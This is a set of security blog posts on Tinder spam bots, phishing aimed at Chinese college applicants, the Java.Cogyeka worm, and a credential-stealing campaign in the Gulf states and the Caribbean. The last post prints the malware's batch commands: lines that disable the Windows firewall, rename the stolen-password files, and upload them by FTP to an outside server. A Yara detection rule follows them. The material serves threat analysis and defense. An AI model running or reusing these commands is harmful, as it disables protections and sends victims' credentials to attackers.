Tinder: Spammers Flirt with Popular Mobile Dating App

Over the last few years, we’ve reported on a number of spam campaigns spreading through various social networking sites and applications. As with any social service, as it becomes popular, spammers look for ways to take advantage of this popularity by targeting the users of these services.

I’ve previously blogged about the popularity of online dating sites and highlighted an example of a malicious campaign using them as part of its lure. Today, one of the most popular online dating services is not a website, but a mobile application called Tinder.

Tinder is a mobile app that finds other users who like you nearby and connects you with them if you’re both interested. It is a very simple premise, which may explain why it has become one of the more popular dating services around. According to recent reports, Tinder users have been matched 50 million times and have provided 4.5 billion ratings on the service.

Recently, a number of users have reported that they have been finding spam accounts using the service.
 

Tinder-Spam-Fig1.png

Figure 1. Example of fake accounts on Tinder
 

Further research confirmed that a number of spam accounts have been created on Tinder.
 

Tinder-Spam-Fig2.png

Figure 2. Mutual Matches notification
 

Just as expected, when a user likes one of these spam accounts they’re instantly notified of the match. The spam accounts don’t seem to respond unless the user engages the account first.

The spam accounts follow a similar script when communicating with Tinder users.
 

Tinder-Spam-Fig3.png

Figure 3. Spam bot auto responses are the same
 

While engaging one of these spam accounts, I found a glitch.
 

Tinder-Spam-Fig4.png

Figure 4. Spam bot aged two years instantly
 

The spam bot seemed to report the wrong age twice, even though the spam account profile listed its age as 26.

Here is what the bot’s script typically looks like (glitch included):

Bot: hey … have we spoken before? 22..female here…you ?
Bot: hey ….. have we chatted before?? 24..female here…..u?
Bot: i’m sorry…I get to be forgetful at times! how’re u??
Bot: Just got online….long week been kind of busy! But I’m feelin’ aroused!! So what’s up …. Wanna have some fun ??  :)
Bot: I need a guy who can [REMOVED]..have u ever [REMOVED]?? hahaa
Bot: going to change my underwear….. want to see?? =)

At this point, the spam bot starts to lure the user in with the promise of a webcam session.
 

Tinder-Spam-Fig5.png

Figure 5. Spam bot begins the lure
 

From here, the spam bot will provide a shortened URL and instructs the user on how to proceed in order to gain access to her webcam session.
 

Tinder-Spam-Fig6.png

Figure 6. Landing page used in Tinder spam
 

If the user accepts the invitation on the landing page, they’re redirected to another site that asks them to sign-up, requesting personal information as well as a credit card number reportedly for age verification.
 

Tinder-Spam-Fig7.png

Figure 7. Membership requires credit card information
 

It’s interesting to note that the spam bot pre-emptively answers concerns about the website and the credit card information.
 

Tinder-Spam-Fig8.png

Figure 8. Spam bot responds to concerns
 

The bot glitches again as it changed part of its script from “sexy” to “handsome” when checking to see if the user has joined the site.
 

Tinder-Spam-Fig9.png

Figure 9. Spam bot glitch and request for “gold”
 

The spam bot also makes a request for some “gold” once the user joins the site. It’s likely that “gold” is a reference to currency used on the site, which a user may need to purchase.

How do the scammers monetize here? Affiliate programs are most often the drivers for much of the spam circulating on social networking sites. In this particular case, it’s best to “read the fine print,” as the old adage says.
 

Tinder-Spam-Fig10.png

Figure 10. Free access includes an upgrade to platinum membership
 

By default, the checkbox for “Upgrade me to a platinum membership” is selected. If this checkbox remains selected, there are two additional sites that the user is signed up for. The sites provide trial memberships of 10 days and 7 days respectively. If the user doesn’t cancel these accounts, they are then billed up to US$80 a month. Unfortunately, the user is often unaware that they are signing up for these additional sites and the scammers will be rewarded through the affiliate programs they signed up for.
 

Tinder-Spam-Fig11.png

Figure 11. Blocking spam accounts on Tinder
 

Currently, there is no way to report spam accounts within the Tinder application. However, the service does offer a way to block users. Therefore, users are advised to block any spam account they’ve been matched with.
 

Tinder-Spam-Fig12.png

Figure 12. Tinder for Android is on its way
 

The spam I’ve found on Tinder seems to be limited at this time. However, there is a concern that the service will see an influx of more spam bot accounts. While Tinder is only available for the iPhone at this time, there are plans to bring the application to Android devices. One trend I’ve observed in the last year is that following the introduction of an Android application, the volume of spam on popular services like these typically increases.

Phishers Target College Candidates in China

After the annual National College Entrance Examination (NCEE), Chinese high school graduates are now busy choosing a college and filling out college applications. The college picks are no trivial matter; it determines matriculation.

Phishers also do not want to miss out on this event and the opportunity to profit. If a candidates’ personal information is stolen by phishers, the victim and their parents can expect to receive a large number of spam messages or annoying phone calls—including civil college and overseas educational agencies advertising, or even attempts at financial fraud. Phishing websites may even make a candidate mistakenly think they have completed an application to a college—but, actually, they did not—which directly affects the candidate's future at this important juncture in their life. In addition, the candidate's information will be sold for profit to overseas educational agencies, fake credentials makers, or re-application services.

Phishers may use the following tricks:

Clone an educational website
The fake Web page is almost identical with the real one, except it includes embedded malicious script or the university contact information is fake. The links on this fake page will mimic the real one. When a candidate searches for a university through a search engine, the link of a fake Web page may appear in the search results. If the candidate clicks any links, they may be lead to a malicious phishing page.

pic1.png.jpg
Figure 1. Phishing site, "Beijing Economic Management Institute"

 

pic2.png
Figure 2. Legitimate site

Scam "smart" cards
This trick entices candidates to buy a "college entrance application smart card". This fake offer usually claims the smart card is used for completing the college entrance applications forms. The smart card is promoted to also provide access to learning skills like how to choose a college, or offer participation in a skills assessment along with helpful practice forms for college application. However, real college applications can only be achieved through legitimate educational websites of provinces, not any other way. These so-called "college entrance application smart cards" are just traps to fool people and obtain money them.

pic3.png.jpg
Figure 3. "College entrance application smart card" scam

Fake enrollment guidance service
This kind of website phishing entices candidates to pay for a service. However, when the user actually pays they will not get any guidance at all, just a loss of their money.

pic4.png
Figure 4. Fake enrollment guidance service

Alternative application process
Some websites may claim they can supply a "short cut" to admission for candidates who do not score highly in the college entrance exams. These websites display a notification asking users to submit their personal information for the application. If users fill out the form with their personal information, phishers will have stolen it for profit.

pic5.png
Figure 5. Fake "short cut" application for college admission

Most of the phishing websites use search engines, forums, or education advisory websites to promote these scams. We suggest candidates and their parents not click any suspicious URLs and be especially cautious during applications to college.

The Java Autorun Worm, Java.Cogyeka (1 of 3)

Java.Cogyeka
Recently there has been a lot of attention drawn to the vulnerabilities in Java and how they can lead to malware being created. However, it is worth noting that a vulnerability is not always required for malware to exist, as is the case with Java.Cogyeka. While this threat does not exploit any vulnerability in Java itself, it is written in the Java language and performs numerous malicious activities, which I intend to explore throughout this series of blogs.

Java.Cogyeka was discovered in July 2012 and is still active now. This malware has five features, which I have broken down into the following categories:

  1. Propagation through autorun.inf
  2. Stealth techniques
  3. Downloader functionality
  4. Obfuscation
  5. Infostealer functionality

Other Java malware we have seen does not have this combination of malicious features. Typically, when we encounter Java in a malicious program, its only purpose is to download other malware, which then performs further malicious actions. However, Java.Cogyeka is a malicious program in its own right and with its own purpose—the Java code itself is being used to perform malicious activities without requiring an additional malicious module. This makes it the most comprehensive Java-only malware that I have ever come across.

This is the first in a series of three blogs on Java.Cogyeka and in this blog I will discuss the following features:

  • Propagation through an autorun.inf file
  • Stealth techniques
  • Downloader functionality

The remaining functions, Obfuscation and Infostealer functionality, will be discussed in future blogs.

Propagation through an autorun.inf file
As previously mentioned, this worm uses autorun.inf to spread and attempts to copy itself to a removable drive using a file name in the following format:

  • %DriveLetter%:\RECYCLER\[SID]\[RANDOM FILE NAME].[THREE RANDOM LETTERS FILE EXTENSION]

It then attempts to copy an autorun.inf file to the root folder of the removal drive in order to execute the worm whenever the removable drive is inserted into another computer.

Technically, a problem exists when creating the autorun.inf file on the removable drive. By design, Java operates within a sandbox and cannot interact directly with the resources of the operating system. Because of this, a Java application cannot directly determine the drive letter of a removable drive, but the Java Native Interface (JNI) offers a possible solution to this problem. The worm needs to know the drive letter of a removable drive in order to store and use the autorun.inf file effectively. To solve this problem, it attempts to call a native WIN32 API method GetDriveType through a Windows binary DLL file that the malware author made specifically for this purpose. This DLL is then accessed indirectly by the Java code using JNI. Symantec also detects the malicious DLL file as Java.Cogyeka.

Determining_the_name_of_removable_drives_243px.png

Figure 1. Determining the name of the removable drive

Stealth techniques
Java.Cogyeka uses certain stealth techniques when compromising a computer. It is doubtful that these techniques successfully trick users of the compromised computer or fool security products for that matter. The threat uses three stealth techniques.

Compromised removable drive icon
The removable drive that is compromised by this malware has its drive icon changed to a folder icon. It is easy to change a drive icon, the malware simply adds “icon=[PATH OF ICON IMAGE]” to the autorun.inf file. This malware uses the folder icon from the shell32.dll file.

Java_Cogyeka_1_of_3_1_edit.png

Figure 2. Removable drive with changed icon

Changing the icon of an executable file is a well-known camouflage technique. If an executable file has a document file icon, like Microsoft Word or Adobe PDF, users may misidentify the executable file as a document file. However, changing the icon of a removable drive is a slightly different case. I do not know why the malware changes the icon of the removable drive, but this is one of the malware's meaningless stealth techniques. If found on the compromised computer, it can be seen as a sign that the malware may be present.

Repacked, not copied
Previously, I stated that the malware copies itself, but this is not entirely accurate. The malware actually repacks itself to the following location:

  • %Temp%\jar_cache[RANDOM DIGITS].tmp

The malware spreads itself as a JAR file. It may try to change the hash value of the JAR file by adding random bytes. The JAR format is like a Zip format that is used to pack Java classes into one file. The malware attempts to add random bytes to an extra field in the Zip headers. However, most security vendor virus scanners can extract Zip files to scan files contained in the archive. They do this so that they can scan the malicious .class file within the JAR file and detect it even though the hash value of the JAR file has changed.

As a result, the malware's modification of the hash value of the JAR file is meaningless.

java.exe instead of a system process
The malware copies java.exe to the following location:

  •  %Temp%\hsperfdata_[USER NAME]\[SYSTEM EXECUTABLE FILE NAME].exe

It uses one of the following system executable file names:

  • csrss
  • explorer
  • lsass
  • services
  • smss
  • svchost
  • winlogon

Users, even if they have administrator privileges, cannot end these processes, except for the explorer.exe process. The malware aims to deter users from ending the process that the worm is running on. However, it uses “javaw” in the StubPath registry subkey, as described in our detection write-up, instead of "[SYSTEM FILE NAME].exe" with "SYSTEM FILE NAME" representing one of the processes listed above. Users who find this malware running as a system process cannot manually end the malware process by using Windows Task Manager. Third-party software, however, can be used to end the process.  It is also worth noting that Symantec Endpoint Protection and Norton Internet Security/Norton 360 products will end this process automatically as soon as it starts.

While the malware author makes it inconvenient for users to end this process manually, the technique used is far from successful.

Downloader functionality
After the malware compromises a computer, it attempts to connect to a server in order to download an additional module. Apparently, this module is a JAR file. It downloads and extracts class files into its memory space and then loads them with the ClassLoader Java class. Through any class loading, a malware author can gain control of the compromised computer. The malware can also download updates with new features for itself or other modules.

To be continued…
This blog is an overview of Java.Cogyeka and how it works to compromise computers. The next blog in the series will discuss obfuscation techniques used by the worm as well as its main module.

Targeted Campaign Steals Credentials in Gulf States and Caribbean

Last week, McAfee’s Foundstone Incident Response team got hold of a piece of malware that was sent out during a phishing campaign. The campaign targeted several companies and institutes in the United Arab Emirates, Oman, Bahrain, and a couple of Caribbean islands.

The executable that was sent with the email was called emiratesstatement.exe and the pictogram of the executable tried to impersonate itself as a PDF.

  • File: emiratestatement.exe
  • Size: 3,325,952 bytes
  • MD5:  0E37B6EFE5DE1CC9236017E003B1FC37

A sample, more than 3MB, is strange. Normally malware samples are less than 1MB. Analyzing the malware, we retrieved a simple XOR key to decrypt the contents of this file:

pic1_xor_decryption

While running this malware through behavioral analysis we extracted more than 14 files from this executable:

aatd.bat 48d6afe2dcb0a98819c1c76cd3cd054d
bms.klm 3268e2c9998a27902151b19eb5a0d8f4
cond.reg 631729880e3feedc0454cddc5014ef7d
dd.vbs cdc8adfcdf51b0e91b56c85f4a5f041d
icd.bat 9e3ff6bf3ac3d989db6e306710bab1b8
ictd.bat 4d7f254f7046e151dde6618d5561d31d
ied.bat f7cb74f59c4f55005f26e43dd146209a
iewed.bat 1af2ab442e95630ee768a2b83868fd60
image.exe a28b22acf2358e6aced43a6260af9170
keeprun.ini 07ec8b360e188bbcf2013a5e3a220e5d
msnd.exe 6f506d7adfcc2288631ed2da37b0db04
picture viewer.exe 8aebade47dc1aa9ac4b5625acf5ade8f
pid.PDF 3bb044c0480af11e5bf466f9f253e2a9
sad.vbs 12a5bdd999d105691555e72100d9b4e9

 

Each of them had several roles in the process of execution and relation. The key components:

  • Msnd.exe: a keylogger writing the output to a TMP file
  • Image.exe: mail password recovery tool written by SecurityXploded
  • Picture viewer.exe: browser password recovery tool written by SecurityXploded

The malware tries two options to install itself:

  • Installing the msnd keylogger and activating the password recovery tools
  • Opening the pid.PDF file. This PDF will open a PDF reader and the malware will inject itself into this process and activate the password-recovery tools.

During the malware’s installation, it disables the Windows firewall by using two simple .bat scripts containing the following code:

@netsh firewall set opmode disable
@cls
@netsh advfirewall set currentprofile state off

After gathering all the recovered passwords and writing them to output files, these files are converted to files starting with the prefix PIC- followed by the date/time and a numerical indicator:

@set d=%date:~-4,4%%date:~-7,2%%date:~0,2%
@set d=%d: =_%
@set t=%time:~0,2%%time:~3,2%%time:~6,2%
@set t=%t: =0%
@RENAME “msn.klm” “PIC_%d%_%t%.014″
@cls
@RENAME “wmsn.klm” “PIC_%d%_%t%.015″

After these files are created, an FTP session transfers the files to this FTP server:

@start /b ftp -i -v -s:bms.klm ftp.freehostia.com                               

A visual representation of the malware and the relations with the different modules:

pic2_working_malware

The FTP site contained several folders with the PIC*.* files:

pic3_ftp_folder

 Folders containing the PIC files:

pic4_ftp_listing

By analyzing the output files, we found the targets of this campaign were situated in the United Arab Emirates, Bahrain, Oman, and a couple of Caribbean islands. The victims ranged from local government entities to companies operating in the telecom sector, IT, travel, and natural resources. The credentials the criminals acquired contained usernames and passwords for a variety of sites:

  • Webmail of the victim’s institute/company
  • Facebook
  • Hotmail
  • Internal CRM system
  • News-site logins
  • Travel reservation systems
  • E-services for governmental institutes
  • Firewall logins
  • Tender site logins

Yara rule to detect the malware:

rule EmiratesStatement :
{
meta:
author = “Christiaan Beek”
date = “2013-06-30″
description = “Credentials Stealing Attack”
hash0 = “0e37b6efe5de1cc9236017e003b1fc37″
hash1 = “a28b22acf2358e6aced43a6260af9170″
hash2 = “6f506d7adfcc2288631ed2da37b0db04″
hash3 = “8aebade47dc1aa9ac4b5625acf5ade8f “

strings:
$string0 = “msn.klm”
$string1 = “wmsn.klm”
$string2 = “bms.klm”
condition:
all of them
}

To prevent these kinds of attacks:

  • Users should not click on files attached to an email that are sent by unknown persons
  • Block emails at the email gateway/mail server that contain an executable file
  • Implement a spam filter that regularly imports up-to-date threat intelligence